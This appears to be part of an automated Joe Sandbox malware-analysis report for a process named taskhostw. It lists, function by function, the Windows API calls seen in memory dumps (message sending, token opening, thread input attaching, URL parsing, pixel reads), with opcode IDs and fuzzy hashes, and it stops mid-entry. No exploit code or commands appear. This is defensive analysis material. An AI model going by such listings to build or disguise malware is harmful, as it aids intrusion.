                                                                  • Instruction ID: 275f24139d1528a01e154219ee79aa8846ccafdbff0b2fdf4408e7a935132d33
                                                                  • Opcode Fuzzy Hash: 239a2ca45bf5b6252dbd7afc66ab331bd95045ebbe17b406671b6803bb516e72
                                                                  • Instruction Fuzzy Hash: F3113032910109AFCB04FFA4EE8ADEEB7B9AF54310B144165F506A7161DF31AF15CB61
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00208E23
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00208E35
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00208E4B
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00208E66
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: cc0ebafbfa66ff8f482110ae7b8bb561d620a30749f877f63680799c7209df83
                                                                  • Instruction ID: 28655d47392b5d2fd40b21cb1cf78e2c1a9de765690f47867f670edeee42958b
                                                                  • Opcode Fuzzy Hash: cc0ebafbfa66ff8f482110ae7b8bb561d620a30749f877f63680799c7209df83
                                                                  • Instruction Fuzzy Hash: E9115A79900218FFEB10DFA5CD85E9EBBB8FB08710F204095FA04B7291DA716E20DB90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                  • Instruction ID: d54336d8941034582e05361e1644cacd82439544d731f9071d13c73810174bb2
                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                  • Instruction Fuzzy Hash: 17014B7204014ABBDF1A6F84CC418EE3FAABB18655B488515FE1858034DB36C6B1AB81
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00216C8F
                                                                    • Part of subcall function 0021776D: _memset.LIBCMT ref: 002177A2
                                                                  • _memmove.LIBCMT ref: 00216CB2
                                                                  • _memset.LIBCMT ref: 00216CBF
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00216CCF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                  • String ID:
                                                                  • API String ID: 48991266-0
                                                                  • Opcode ID: c8a11947a62ebd7a633251fc1adc5ed6493a2c3318b28068e8ca1064ea717058
                                                                  • Instruction ID: edcf024ef09fd84df50e6a04b7d89c1121a8ee72e994f06dc68ee97bc94c1add
                                                                  • Opcode Fuzzy Hash: c8a11947a62ebd7a633251fc1adc5ed6493a2c3318b28068e8ca1064ea717058
                                                                  • Instruction Fuzzy Hash: FAF0543A100104ABCF516F55EDC5E8ABB69EF55320F148065FE085E25AC771A851CBB4
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0020A179
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0020A18C
                                                                  • GetCurrentThreadId.KERNEL32(00000000), ref: 0020A193
                                                                  • AttachThreadInput.USER32(00000000), ref: 0020A19A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 2710830443-0
                                                                  • Opcode ID: 2daa1c086fe747aada767dd3dae0589bfda65e2daf43438bba1152ad8a42bd8b
                                                                  • Instruction ID: 312d5abd17e99030e47b26629b607b2eb466447493e95496e9b6c32bc56b3b6a
                                                                  • Opcode Fuzzy Hash: 2daa1c086fe747aada767dd3dae0589bfda65e2daf43438bba1152ad8a42bd8b
                                                                  • Instruction Fuzzy Hash: 4CE03931941328BBDB201FA2FD0DED77F1CEF267A1F808024F50D840A1C6718550CBA0
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008,00000000), ref: 001B2231
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 001B223B
                                                                  • SetBkMode.GDI32(?,00000001), ref: 001B2250
                                                                  • GetStockObject.GDI32(00000005), ref: 001B2258
                                                                  • GetWindowDC.USER32(?), ref: 001EC003
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 001EC010
                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 001EC029
                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 001EC042
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 001EC062
                                                                  • ReleaseDC.USER32(?,00000000), ref: 001EC06D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 1946975507-0
                                                                  • Opcode ID: e19fc2df74f7cfb6fc1ff48a2ceadf1873200eb31a77911fa8d76edf02e52a06
                                                                  • Instruction ID: 6ee1760e428f52168f6b1113389f946022ea4379a931859b6ef401e99fea9166
                                                                  • Opcode Fuzzy Hash: e19fc2df74f7cfb6fc1ff48a2ceadf1873200eb31a77911fa8d76edf02e52a06
                                                                  • Instruction Fuzzy Hash: 97E03932904684EAEF615F64FD0DBD83B10EB05332F008366FAA9880E187B14991DF11
                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,002084BD,?,?,?,0020860E), ref: 00208A43
                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,0020860E), ref: 00208A4A
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0020860E), ref: 00208A57
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,0020860E), ref: 00208A5E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3974789173-0
                                                                  • Opcode ID: 425a36d4d5895cc4f726b6a565da12cbb28d9a6dc1d8c5dbc33906bdf929ebb2
                                                                  • Instruction ID: 288dabf2587e0d5fd6da0b3786214c7d129748086c78a91c11adef54e083588d
                                                                  • Opcode Fuzzy Hash: 425a36d4d5895cc4f726b6a565da12cbb28d9a6dc1d8c5dbc33906bdf929ebb2
                                                                  • Instruction Fuzzy Hash: 3DE04F36A05321DFD7A05FB47E0CB573BA8EF50792F044829A685D9095DA2494518750
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 001F20B6
                                                                  • GetDC.USER32(00000000), ref: 001F20C0
                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001F20E0
                                                                  • ReleaseDC.USER32(?), ref: 001F2101
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: 157f17567d70dcdea47dbaff05661120cf748879009722f593e6e5f1a918f154
                                                                  • Instruction ID: 8ff92462c3144107b95e5951b1caeacf6fb2e6b2b554761cd4ba7007881ae090
                                                                  • Opcode Fuzzy Hash: 157f17567d70dcdea47dbaff05661120cf748879009722f593e6e5f1a918f154
                                                                  • Instruction Fuzzy Hash: 43E0E575800204EFCB419F60EA0DAAD7BB5EB5C310F118026F96AA7220CB3881429F40
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 001F20CA
                                                                  • GetDC.USER32(00000000), ref: 001F20D4
                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001F20E0
                                                                  • ReleaseDC.USER32(?), ref: 001F2101
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: d62aa95e410f7d026d4fffa654dbae6a56680c1cb06ff550f5e82c728fc82035
                                                                  • Instruction ID: c45ae44bd686ebe132ea59d9a2b61638cb8493bf2fae896a4226dc3efc420168
                                                                  • Opcode Fuzzy Hash: d62aa95e410f7d026d4fffa654dbae6a56680c1cb06ff550f5e82c728fc82035
                                                                  • Instruction Fuzzy Hash: 26E01A75C00204AFCB419F70EA0DA9D7BF5EB5C310F118025F96AA7220CB3891419F40
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %$
                                                                  • API String ID: 0-817995946
                                                                  • Opcode ID: d8027944e1a65d975550db176c9b58e8ed69683b6c3ce9249da2eb11949dc540
                                                                  • Instruction ID: 147970ea36d4bbc3e7d802a2601c3ba6e291b18c9d4ae698dd627ae7ce054f0f
                                                                  • Opcode Fuzzy Hash: d8027944e1a65d975550db176c9b58e8ed69683b6c3ce9249da2eb11949dc540
                                                                  • Instruction Fuzzy Hash: 14B1F771C002099BCF24EF98C891AFEB7B5FF64350F54412AF906A7295EB389E91CB51
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __itow_s
                                                                  • String ID: xbL$xbL
                                                                  • API String ID: 3653519197-3351732020
                                                                  • Opcode ID: 56073d7c24255b46c9ca68ff61e3126421b9fb5d4b911621f3f11c69bd685f99
                                                                  • Instruction ID: 28fc769768b2508ecb68ab3b8cea8c538b82c109e5f50bbcc636d5baddea50ab
                                                                  • Opcode Fuzzy Hash: 56073d7c24255b46c9ca68ff61e3126421b9fb5d4b911621f3f11c69bd685f99
                                                                  • Instruction Fuzzy Hash: 05B15E74A40209EBCB14EF54C990EBAB7BAFF58304F24845DED459B292EF30D981CB60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __itow_s
                                                                  • String ID: xb'$xb'
                                                                  • API String ID: 3653519197-4081426872
                                                                  • Opcode ID: fbcc48ab8cb055f2401ef97dd0b80916748f7886848438a185bd87532c50fdec
                                                                  • Instruction ID: 94d97e49189613ea9b89243750d1ff4905faa16fb775596a19caa8e53db1f85f
                                                                  • Opcode Fuzzy Hash: fbcc48ab8cb055f2401ef97dd0b80916748f7886848438a185bd87532c50fdec
                                                                  • Instruction Fuzzy Hash: 92B1A030A1021AEFCB15DF94D890EEEB7B9FF58300F148559F9459B291EB30EA91CB60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memset
                                                                  • String ID:
                                                                  • API String ID: 2102423945-3916222277
                                                                  • Opcode ID: d177416e6a454e8b4d6cd960176f58a6f747173ab49f4f5db27cd0289266fd55
                                                                  • Instruction ID: b81ba60907e9922d516d4f0446d26dac4b0c836e32b952aea5b963812fefe8ba
                                                                  • Opcode Fuzzy Hash: d177416e6a454e8b4d6cd960176f58a6f747173ab49f4f5db27cd0289266fd55
                                                                  • Instruction Fuzzy Hash: FF816971900209AFEF119FA4DD94EEFFBB9EF08308F144169F914A7260DB318A19DB60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat
                                                                  • String ID: \
                                                                  • API String ID: 2563891980-2967466578
                                                                  • Opcode ID: e56d7c4266432a0f4c02bf2e6b1fbb6acfac889eda8ece4603485dfb309dafd5
                                                                  • Instruction ID: 93096702912f859c6a0ce68d77283abd9b9e544d26388f8ef0eb8822fcf2464e
                                                                  • Opcode Fuzzy Hash: e56d7c4266432a0f4c02bf2e6b1fbb6acfac889eda8ece4603485dfb309dafd5
                                                                  • Instruction Fuzzy Hash: 28718B71444311AEC714EF25ED80DABBBE9FF98350B41897EF845831A0EF709948CB5A
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 02ACE95C
                                                                  • _memset.LIBCMT ref: 02ACEA25
                                                                    • Part of subcall function 02A58D97: __itow.LIBCMT ref: 02A58DC2
                                                                    • Part of subcall function 02A58D97: __swprintf.LIBCMT ref: 02A58E0C
                                                                    • Part of subcall function 02A6F206: _wcscpy.LIBCMT ref: 02A6F229
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$__itow__swprintf_wcscpy
                                                                  • String ID: @
                                                                  • API String ID: 2523036003-2766056989
                                                                  • Opcode ID: b4afbc4ec8ce6098afefaedd6866cb806fa6b13999c5cd6bd0421d5a68627add
                                                                  • Instruction ID: 92e9e6a81eb2cff6886fc3456cddd0a4f5708c974e360cf6727ae3da1126ac59
                                                                  • Opcode Fuzzy Hash: b4afbc4ec8ce6098afefaedd6866cb806fa6b13999c5cd6bd0421d5a68627add
                                                                  • Instruction Fuzzy Hash: 68615CB5A006299FCB14EF64C6849AEBBF6FF48314B14845DE856AB350DF34AD40CF94
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 001C2AC8
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 001C2AE1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  • Opcode ID: 3fd70d5c5b4fe9fccc96bd2b2868206b41a866585cd5f5dcd5502535060769a8
                                                                  • Instruction ID: 5534a2944127aba4351f63dc8f2f2222111c4f0c10e71f6434cf6293b6161d51
                                                                  • Opcode Fuzzy Hash: 3fd70d5c5b4fe9fccc96bd2b2868206b41a866585cd5f5dcd5502535060769a8
                                                                  • Instruction Fuzzy Hash: 8B5146724187449BD320BF20E886BABBBFCFB95314F41885DF2D9511A1DB30856ACB66
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID: Dd'$Dd'
                                                                  • API String ID: 1473721057-838088433
                                                                  • Opcode ID: dc6c5097cd61ca0cc46811ea2754439b5ccaa7b70d21c7214440a767f96ecee2
                                                                  • Instruction ID: 636b21bf4d66096150843aa490ffc7c02425aa3c3d9d44304593972519703c57
                                                                  • Opcode Fuzzy Hash: dc6c5097cd61ca0cc46811ea2754439b5ccaa7b70d21c7214440a767f96ecee2
                                                                  • Instruction Fuzzy Hash: 175103786083428FD764CF19C494A6ABBF1BF99354FA4885DE9858B321D331EC81CF82
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memset
                                                                  • String ID: 0$F
                                                                  • API String ID: 2102423945-3044882817
                                                                  • Opcode ID: 1c0eb870b8700fff3a399a86abb9af46b1e35f470247ba509b19d6def160a180
                                                                  • Instruction ID: d50dc01365c0481e902b8f78fc19dc1940063ffad11bcbb356512241e1a3e9f5
                                                                  • Opcode Fuzzy Hash: 1c0eb870b8700fff3a399a86abb9af46b1e35f470247ba509b19d6def160a180
                                                                  • Instruction Fuzzy Hash: 86415A78A01209EFDB14DF68E888F9A7BB9FF49700F144429E906A7360DB31A914CF54
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002226B4
                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002226EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CrackInternet_memset
                                                                  • String ID: |
                                                                  • API String ID: 1413715105-2343686810
                                                                  • Opcode ID: e99a9e1e054f9038a51dbb6451e408a57e00e078de55852f0e384e6cf41bc024
                                                                  • Instruction ID: 83c0f319dc2f02cd487f533952f39abdd534ecbe10175425f2bf5b6f9a518bdb
                                                                  • Opcode Fuzzy Hash: e99a9e1e054f9038a51dbb6451e408a57e00e078de55852f0e384e6cf41bc024
                                                                  • Instruction Fuzzy Hash: B0310571814119AFCF11EFA4DC85EEEBFB9FF18310F100069F815A6266EB325A56DB60
                                                                  APIs
                                                                  • DestroyWindow.USER32 ref: 00236B49
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00236B85
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Window$DestroyMove
                                                                  • String ID: static
                                                                  • API String ID: 2139405536-2160076837
                                                                  • Opcode ID: 290310097e6e3457031993daf3b1ed5e1166ca7120c71d64e73850d1975d6505
                                                                  • Instruction ID: c8e3e2877f8be621fe69a77a3d47b6eee01fd17a6b52888f0ff004b387fb488e
                                                                  • Opcode Fuzzy Hash: 290310097e6e3457031993daf3b1ed5e1166ca7120c71d64e73850d1975d6505
